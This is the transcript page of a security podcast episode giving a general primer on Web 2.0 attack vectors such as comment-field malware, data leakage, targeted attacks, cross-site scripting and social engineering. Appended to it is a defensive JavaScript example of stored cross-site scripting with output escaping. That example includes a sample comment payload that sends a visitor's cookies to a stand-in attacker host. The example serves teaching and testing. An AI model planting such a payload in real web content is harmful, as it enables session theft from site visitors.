
The Mike Rothman Security Report


Understanding Web 2.0 Attacks


In this month's Mike Rothman Security Report, Mike flies solo and rants a bit about Web 2.0 attack vectors. Since Web 2.0 is all the rage and you are hearing from folks you haven't spoken to since elementary school, Mike provides a primer on the types of attacks that you are likely to see from social networks. The good news is there really isn't anything new. The bad news is that everything is happening a lot faster in this age of user-generated content.

Mike also gives himself the "free association" treatment, discussing topics like Facebook and the impact of Web 2.0 on PCI.

Listen to or download the 11:39 minute podcast below:



Hi, welcome back to the Mike Rothman Security Report here on the ebizQ Network. This month I'm actually going to fly solo because our topic to talk about is Web 2.0 security and really the application issues and application risks that we face as a result of these Web 2.0 types of applications, and what kind of risks and what kind of threats.

Basically, how many different ways can we get compromised and slammed by our social networking types of applications and this penchant that everybody has to share information about themselves? So that's what we're going to talk about here this month.

And I think it’s actually a pretty timely type of discussion for a lot of reasons. And one, I mean, I’m sure many of you that listen to the podcasts on ebizQ tend to be corporate types and that means that somewhere in your organization somewhere bubbling up is the need to use applications like MySpace, like Facebook, like maybe LinkedIn to really start to build communities around your business, right.

Maybe you have some bloggers that are internally writing about what it is that you do, talking, getting involved in the conversation trying to figure out from a thought leadership standpoint how you can present whatever it is that you do in the best possible light.

Well, any time you use that code word called “user generated content”, that means you have some type of security risk. And why? It's because a lot of these applications that are being built and that are being put in place nowadays allow users to basically add, if not websites, then certainly content to your site.

And wherever they can basically fill out a form and input information that can be seen by other people, that gives them the opportunity to basically compromise your site if you're not careful. So what we're going to do this month is talk a little bit about the risk, talk a little bit about the threat vectors that we have to deal with, or the attack vectors that we have to deal with.

And then next month, I'll have another guest to be determined, it’s a surprise, to really talk about a lot of the defensive aspects of Web 2.0 that we are starting to see emerge. So when we think about the risks, what I can say is that they’re not a lot different than what it is that we’re dealing with when you're talking about general application types of security, or even more generic information security.

We’ve got malware as a risk, malicious code that folks are implementing either by adding images that are compromised, or adding scripts into your comment fields so that anybody that renders the web page then gets compromised, because script obviously runs code in somebody else's browser. We got drive-by downloads.

Again, these are types of data that would be input into your website that then, again, downloads some type of malicious code to the visitor whenever they show up. Again, we’ve seen a lot of different applications that have been vulnerable to this kind of thing whether it's any of the blogging networks or something like MySpace or even Facebook.

We have spam. Obviously, the spammers are out in force and they're doing a couple of things. The spammers are really 1) about getting their message out, whatever it is that they're pushing, but 2) they’re also again trying to implement and integrate malicious code into your site. So if you get a friend request from somebody that you don't know, in many cases there could be something compromised or something malicious about the intent of that type of friend request, so we have to be careful about that.

We got data leakage. Obviously, folks are sharing more and more of their reality, more and more of whatever it is that they do out on these networks. And of course, if we just look back to Governor Palin here in the United States, the vice presidential candidate, she had her Yahoo mail compromised because of basically some information that she shared out there.

And obviously, she’s a public figure and people did all sorts of digging to figure out what she was about but that information was used to compromise her specific information out on the network, used that to get into her e-mail and then create all sorts of havoc.

The whole data leakage thing is really related to targeted attacks. This is another thing that we're starting to see a lot more of, especially, when you think about the individuality of something like Facebook, something like MySpace because what that does is it allows somebody to target, for instance, a high net worth individual.

Maybe you get a friend request from somebody that you knew. Well, how do you know them? Well, because maybe you published somewhere that you went out with Bob and you had a great time at the ball game or something like that. Well, amazingly enough, maybe Bob sends you a friend request. But it's not Bob, it's actually Andres, who happens to be in Estonia, who is trying to use that information to friend you to be able to compromise your specific environment, or send you an e-mail that says hey, I know all about your mortgage that is having problems because you are a customer of Wachovia, for example.

Maybe you're a little concerned because of the Citigroup acquisition. Again, there are lots of different ways to find information about you that can be used within the targeted attack that is again somewhat unique to Web 2.0 just because you are sharing a lot more information out there. We got traditional application attacks as another way Web 2.0 applications can be compromised.

And these are the cross-site scripting attacks, the cross-site request forgery attacks I've spoken about at length on previous editions of the Mike Rothman Security Report, so you may want to go back, search the archives at the ebizQ Network and check out those posts and those podcasts.

Because, again, I do some introductory types of information about those specific attacks, but those are very much in play when you talk about Web 2.0 because again they’re typically application attacks from that perspective, so we're not able to get out from underneath a lot of those very specific types of application attacks.

And finally, there's the whole thing of social engineering, right. Again, it's still back to preying on the gullibility of many of the users out there. You send them a message saying hey, click on this thing, it's really funny, or click on this thing, Bin Laden’s been captured, or click on this thing, the bailout in the United States didn't go through. And lo and behold, you go to a web site that then renders some code because it's been uploaded to this Web 2.0 site and you’re compromised from that standpoint.

So all these things are still in play, still very much a problem from the standpoint of Web 2.0. So again, what’s the impact here, right? We all know the world's a problem. We all know that, basically, we’re kind of screwed from the standpoint of what it is that we're doing relative to protecting ourselves from Web 2.0. Again, next month we’re going to talk a little bit about these specific defenses, but in general, we have to be aware.

In general, we have to be testing our applications to make sure that we are using and understanding what specific vulnerabilities, what specific exploit paths are actually available to the specific applications. Because again, if you don't even know what's vulnerable, if you don't know how you can be compromised, how are you going to fix it?

So again, I'm a big fan of testing our applications. I'm a big fan of penetration testing. I'm a big fan of application scanners because again, I believe it’s very important to know what is vulnerable from the standpoint of your specific application. Again, I don't think a lot of these problems are going to go away anytime soon because there's still a huge, a huge economic incentive for the bad guys to continue to do what it is that they're doing.

So again, I think the problem is going to get worse before it gets better. I wanted this month to really talk a little bit about these specific attack vectors that we’re dealing with, as opposed to next month when we start talking about solutions, so I'll put you on hold a little bit from that standpoint. Sorry about that, but again, in a 10-minute podcast I can't really go through both in one specific session.

We’ll have a great guest next month, so that's kind of the main session. But what I also want to do is maybe do a little bit of free association on myself, because this is really one of those things where, God, I put everybody else through free association, maybe I should do it myself.

So okay, I'll try to be schizophrenic a little bit here and out of one side of my brain blurt out a topic, something like Facebook, and then out of the other side of my brain I'll have to respond in basically a paragraph or two. And in general, Facebook is one of these things that you kind of have to be involved in because a lot of your customers, a lot of your users, a lot of your employees are involved in this.

And again, it's one of these places that's kind of a festering pit of malware right now. It isn't really that high profile an issue because nothing truly malicious has really happened on Facebook, but I think that's a matter of time. So I am cautiously skeptical that we’ll be able to continue to escape some massive Facebook type of either privacy or data leakage type of thing, so watch this space from that standpoint.

And the other thing, my next free association topic, let’s say PCI, right. So a lot of folks are vulnerable or have to be compliant with PCI regulations. If you collect credit cards, how does Web 2.0 impact PCI? Well basically, again, a lot of it just gets back to the same ideas that I was talking about earlier on in the podcast. Web 2.0, it's interesting, but it’s not necessarily that different from what it is that we've done before.

Part of PCI is to do web application testing, it’s to maybe build your applications using a secure development life cycle, maybe it's to build your specific environment and use a web application firewall to protect those applications. So those are things that can apply to Web 2.0 applications just as they can to any other web application. So to me PCI, again, it’s just more of the same from that standpoint.

So with that, I want to thank you for your time and your attention. I want to once again thank my host for the Mike Rothman Security Report, myself. And also, thank the ebizQ Network, who are so kind and gracious to give me a forum to basically babble about all the things that I think are important. So we'll see you next month when we talk a little bit more about Web 2.0 defenses. And until then, this is Mike Rothman. Be well.

ebizQ is proud to bring you Security Incite's Mike Rothman, who podcasts and writes on application security and related topics.
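The comment-field script injection Mike describes in the podcast is stored cross-site scripting: user-generated content is written into a page and then runs in every later visitor's browser. The following is an added example, not code from the podcast or from ebizQ, that puts a vulnerable comment renderer next to an output-encoded one and includes the kind of check an application scanner or test suite would run over the rendered page. The comment text, the attacker.example host and all function names are constructed for illustration.

```javascript
// Added example (not from the podcast): stored XSS through a comment field,
// and the output encoding that stops it.

// Constructed sample comment, as an attacker would submit it through the
// site's comment form. The host attacker.example is a placeholder.
const HOSTILE_COMMENT =
  'Great post! <script>document.location="http://attacker.example/?c=" + document.cookie</script>';

// Vulnerable renderer: user text is concatenated straight into the page.
// Any <script> tag (or onerror handler, etc.) in the comment becomes real
// markup that every later visitor's browser executes.
function renderCommentUnsafe(author, body) {
  return `<div class="comment"><b>${author}</b>: ${body}</div>`;
}

// Encode the five characters that let text break out of an HTML text node
// or a quoted attribute value. Encoding happens at output time, for the
// HTML-body context this template uses; a URL or JavaScript context would
// need its own encoder.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#x27;',
  })[ch]);
}

// Hardened renderer: same layout, but both user-controlled fields are
// escaped, so the browser displays the tag text instead of running it.
function renderCommentSafe(author, body) {
  return `<div class="comment"><b>${escapeHtml(author)}</b>: ${escapeHtml(body)}</div>`;
}

// Cheap check a test suite or scanner can run over rendered output: did a
// user-supplied script tag survive as live markup?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Render the same hostile comment both ways so the difference is visible.
console.log('unsafe:', renderCommentUnsafe('alice', HOSTILE_COMMENT));
console.log('safe:  ', renderCommentSafe('alice', HOSTILE_COMMENT));
console.log('script tag survives (unsafe):', containsScriptTag(renderCommentUnsafe('alice', HOSTILE_COMMENT)));
console.log('script tag survives (safe):  ', containsScriptTag(renderCommentSafe('alice', HOSTILE_COMMENT)));
```

The point of the scanner-style check is the one the podcast makes about testing: a regression test that feeds a known hostile comment through every template and asserts that no script tag survives catches the bug before a visitor's browser does. In a real application the escaping should come from the template engine's default auto-escaping rather than a hand-written helper, and a Content Security Policy adds a second layer if a template is missed.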
